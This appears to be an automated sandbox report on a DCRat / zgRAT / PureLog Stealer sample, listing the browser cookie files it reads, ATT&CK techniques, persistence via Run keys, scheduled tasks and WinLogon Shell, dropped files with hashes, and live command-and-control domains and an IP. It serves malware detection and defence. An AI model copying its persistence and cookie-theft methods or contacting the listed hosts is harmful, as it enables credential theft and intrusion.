                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                              Remote Access Functionality

                              Source: Yara match, File source: 0.2.s5duotgoYD.exe.131da5f8.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: s5duotgoYD.exe PID: 7416, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: RuntimeBroker.exe PID: 8240, type: MEMORYSTR
                              Source: Yara match, File source: s5duotgoYD.exe, type: SAMPLE
                              Source: Yara match, File source: 0.0.s5duotgoYD.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match, File source: C:\Recovery\xKVBpkhCEjg.exe, type: DROPPED
                              Source: Yara match, File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, type: DROPPED
                              Source: Yara match, File source: C:\Windows\ModemLogs\conhost.exe, type: DROPPED
                              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                              Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                              Execution: Windows Management Instrumentation (241); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                              Persistence: Scripting (1); DLL Side-Loading (1); Registry Run Keys / Startup Folder (31); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                              Privilege Escalation: DLL Side-Loading (1); Process Injection (11); Registry Run Keys / Startup Folder (31); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                              Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); File Deletion (1); Masquerading (133); Virtualization/Sandbox Evasion (271); Process Injection (11)
                              Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                              Discovery: File and Directory Discovery (2); System Information Discovery (144); Security Software Discovery (351); Process Discovery (1); Virtualization/Sandbox Evasion (271); Application Window Discovery (1); Remote System Discovery; System Owner/User Discovery; Network Sniffing
                              Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                              Collection: Archive Collected Data (11); Data from Local System (1); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                              Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                              [Behavior graph: ID 1554055, Sample: s5duotgoYD.exe, Startdate: 12/11/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
s5duotgoYD.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
s5duotgoYD.exe | 100% | Avira | HEUR/AGEN.1323342
s5duotgoYD.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label | Link
C:\Recovery\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\Desktop\UAuXMqPf.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\XIsgiJJb.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\Desktop\WgRxdDkv.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Recovery\xKVBpkhCEjg.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\CjKcCUFn.log | 100% | Joe Sandbox ML
C:\Recovery\RuntimeBroker.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\UAuXMqPf.log | 100% | Joe Sandbox ML
C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\WgRxdDkv.log | 100% | Joe Sandbox ML
C:\Recovery\xKVBpkhCEjg.exe | 100% | Joe Sandbox ML
C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\RuntimeBroker.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\xKVBpkhCEjg.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CjKcCUFn.log | 8% | ReversingLabs
C:\Users\user\Desktop\SlQgWXuB.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\UAuXMqPf.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\WgRxdDkv.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\XIsgiJJb.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\cZuWGjpj.log | 4% | ReversingLabs
C:\Users\user\Desktop\kZSUvzow.log | 8% | ReversingLabs
C:\Users\user\Desktop\mjoVvRUx.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\pkWDNnmN.log | 24% | ReversingLabs
C:\Users\user\Desktop\vEZKvYQi.log | 24% | ReversingLabs
C:\Users\user\Desktop\vNwKfKje.log | 4% | ReversingLabs
C:\Users\user\Desktop\vlWcZFKy.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\ModemLogs\conhost.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\twain_32\xKVBpkhCEjg.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              No Antivirus matches
                              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
500154cm.n9shteam.in | 37.44.238.250 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
37.44.238.250 | 500154cm.n9shteam.in | France | | 49434 | HARMONYHOSTING-ASFR | true
                                                                                        IP
                                                                                        127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554055
Start date and time: 2024-11-12 00:41:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 56
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: s5duotgoYD.exe
renamed because original name is a hash value
Original Sample Name: B379F4AC167609D8A3EF26444098B61D.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@48/304@1/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information: Failed
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, schtasks.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target RuntimeBroker.exe, PID 8240 because it is empty
                                                                                        • Execution Graph export aborted for target backgroundTaskHost.exe, PID 9136 because it is empty
                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                        • VT rate limit hit for: s5duotgoYD.exe
Time | Type | Description
18:42:06 | API Interceptor | 167x Sleep call for process: powershell.exe modified
18:42:16 | API Interceptor | 2024881x Sleep call for process: RuntimeBroker.exe modified
18:42:18 | API Interceptor | 2x Sleep call for process: svchost.exe modified
23:42:03 | Task Scheduler | Run new task: backgroundTaskHost path: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
23:42:04 | Task Scheduler | Run new task: backgroundTaskHostb path: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
23:42:04 | Task Scheduler | Run new task: conhost path: "C:\Windows\ModemLogs\conhost.exe"
23:42:04 | Task Scheduler | Run new task: conhostc path: "C:\Windows\ModemLogs\conhost.exe"
23:42:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
23:42:05 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
23:42:05 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
23:42:05 | Task Scheduler | Run new task: s5duotgoYD path: "C:\Users\user\Desktop\s5duotgoYD.exe"
23:42:05 | Task Scheduler | Run new task: s5duotgoYDs path: "C:\Users\user\Desktop\s5duotgoYD.exe"
23:42:06 | Task Scheduler | Run new task: xKVBpkhCEjg path: "C:\Recovery\xKVBpkhCEjg.exe"
23:42:06 | Task Scheduler | Run new task: xKVBpkhCEjgx path: "C:\Recovery\xKVBpkhCEjg.exe"
23:42:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\ModemLogs\conhost.exe"
23:42:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg "C:\Recovery\xKVBpkhCEjg.exe"
23:42:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
23:42:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run s5duotgoYD "C:\Users\user\Desktop\s5duotgoYD.exe"
23:42:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
23:43:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\ModemLogs\conhost.exe"
23:43:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg "C:\Recovery\xKVBpkhCEjg.exe"
23:43:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
23:43:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run s5duotgoYD "C:\Users\user\Desktop\s5duotgoYD.exe"
23:43:38 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
23:43:47 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\ModemLogs\conhost.exe"
23:43:55 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg "C:\Recovery\xKVBpkhCEjg.exe"
23:44:04 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
23:44:13 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run s5duotgoYD "C:\Users\user\Desktop\s5duotgoYD.exe"
23:44:30 | Autostart | Run: WinLogon Shell "C:\Recovery\RuntimeBroker.exe"
23:44:38 | Autostart | Run: WinLogon Shell "C:\Windows\ModemLogs\conhost.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37.44.238.250 | QMT2731i8k.exe | malicious | DCRat | 117813cm.n9shteam.in/ExternalRequest.php
37.44.238.250 | EQdhBjQw4G.exe | malicious | DCRat, PureLog Stealer, zgRAT | 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
37.44.238.250 | 3AAyq819Vy.exe | malicious | DCRat, PureLog Stealer, zgRAT | 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
37.44.238.250 | HcEvQKWAu2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
37.44.238.250 | k1iZHyRK6K.exe | malicious | DCRat | 452132cm.n9shteam2.top/Processdownloads.php
37.44.238.250 | FuWRu2Mg82.exe | malicious | DCRat, PureLog Stealer, zgRAT | 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
37.44.238.250 | cGZV10VyWC.exe | malicious | DCRat, PureLog Stealer, zgRAT | aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
37.44.238.250 | qZoQEFZUnv.exe | malicious | DCRat, PureLog Stealer, zgRAT | rollsroys.top/externaljsapisql.php
37.44.238.250 | QDJA9geR12.exe | malicious | DCRat, PureLog Stealer, zgRAT | merlion.top/PythongameTrafficDatalifepublic.php
37.44.238.250 | Q9AQFOA6YC.exe | malicious | DCRat, PureLog Stealer, zgRAT | 492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
                                                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HARMONYHOSTING-ASFR | QMT2731i8k.exe | malicious | DCRat | 37.44.238.250
HARMONYHOSTING-ASFR | EQdhBjQw4G.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | 3AAyq819Vy.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | HcEvQKWAu2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | k1iZHyRK6K.exe | malicious | DCRat | 37.44.238.250
HARMONYHOSTING-ASFR | FuWRu2Mg82.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | cGZV10VyWC.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | qZoQEFZUnv.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | QDJA9geR12.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | Q9AQFOA6YC.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
                                                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\CjKcCUFn.log | QMT2731i8k.exe | malicious | DCRat
C:\Users\user\Desktop\CjKcCUFn.log | EQdhBjQw4G.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CjKcCUFn.log | 3AAyq819Vy.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CjKcCUFn.log | TGh6AUbQkh.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CjKcCUFn.log | k1iZHyRK6K.exe | malicious | DCRat
C:\Users\user\Desktop\CjKcCUFn.log | VfKk5EmvwW.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CjKcCUFn.log | cGZV10VyWC.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CjKcCUFn.log | PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CjKcCUFn.log | 9D7RwuJrth.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CjKcCUFn.log | qZoQEFZUnv.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (950), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):950
                                                                                                            Entropy (8bit):5.904090873642416
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:5jTY88c87QS4vECsPgzfHQvPonNtbPE6z0w9:5jk80UGCsZXonNtH3
                                                                                                            MD5:A652303A27F1F230A23D66BF0840DF54
                                                                                                            SHA1:0A9CF7D86C56D94B9003AA44937C40EE272A50E1
                                                                                                            SHA-256:BC4A1330608A3CD738684BBAA9C1B4847600CD09BB41A387D6863D83733DCA82
                                                                                                            SHA-512:A82D64D612CCEFB2A0D2FCC194363EC6B04E35F2DAAE6027B9386F54924C5AE9D576B03B16F1E9A9F55697F94CE129C8A6B0E3E8FF4ABFF97A2877C4AB98A25C
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8ab47ca3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.4221481183032556
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                                                                                            MD5:16A2D79E7FD613644F2F931BAC749111
                                                                                                            SHA1:22ADE6A70F65A0EA4A97D5A75FAA987CBEE20BB5
                                                                                                            SHA-256:2926390341798067C07F476761129F571F7C87148A76664F21AFE81C01451953
                                                                                                            SHA-512:137BCF1F1C9E822E669EA6D114D92FE82A84A21C7DA3ADC93C0FD589B770842BC3AAC5A27549C8B888E1E626BC1DCCB933ADE41EE3A85A6199A77C5BE337B27C
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):117
                                                                                                            Entropy (8bit):5.5102563097790584
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:y1XReCJq3qQVuj2aJRvbdbTZIx2LoRSOnHQpT1G7OvmzVg:y1ZQVuKUtIx2LoRnwpY7t5g
                                                                                                            MD5:B1395BA64D7F96D287363976F9675311
                                                                                                            SHA1:F5D784219164F7BC8D32AB6C6FB3B716BEB16087
                                                                                                            SHA-256:48EF012F384E02A688B5981891E99053FB5E03ED094226585117E4C86F65DAE1
                                                                                                            SHA-512:EDB4CB7D5F312AF7288318788F9B2900072B4577B86EF0928F6B7D0132A25E462251CC1AF9074BE4CFC75F8B7E20D38DFA4FA0038AC2EE6D78C9EF80B8C2E89A
                                                                                                            Malicious:false
                                                                                                            Preview:tbsrEYZdwISSv24BE3yn5t0vDYcNODVHC9ERpb0vXzbTJ1pKFS3mGlL9k6nq6MPtxLPvynWmCDPGSgmMtRH5JsBbyEqsxKzLkrg8l3Wc6RkDVFrDUb6pE
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (788), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):788
                                                                                                            Entropy (8bit):5.876432277032464
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:zWlVv2DdoB7VX3Rug7ivaa5EdYsm+M3qDav:Kl1MW92pp5Eqs5M3Bv
                                                                                                            MD5:0C9054E09267D47D3716526BAD171BCD
                                                                                                            SHA1:054241A41FA35882D841D207DD0AD50D17EB236C
                                                                                                            SHA-256:918EE6A7A76E6410ED36AFA0868F1F1EF9A637B06B3F5E5E1497CC098ACA68EF
                                                                                                            SHA-512:723D7168D1F45318DB83076F7B2593688A8D8F178450FA38392D607AD353E0A5C1EFC47EEA81F5EB0A5139B66E60F37C45E3C0B7303B5AC0B47BF11D44D2511E
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
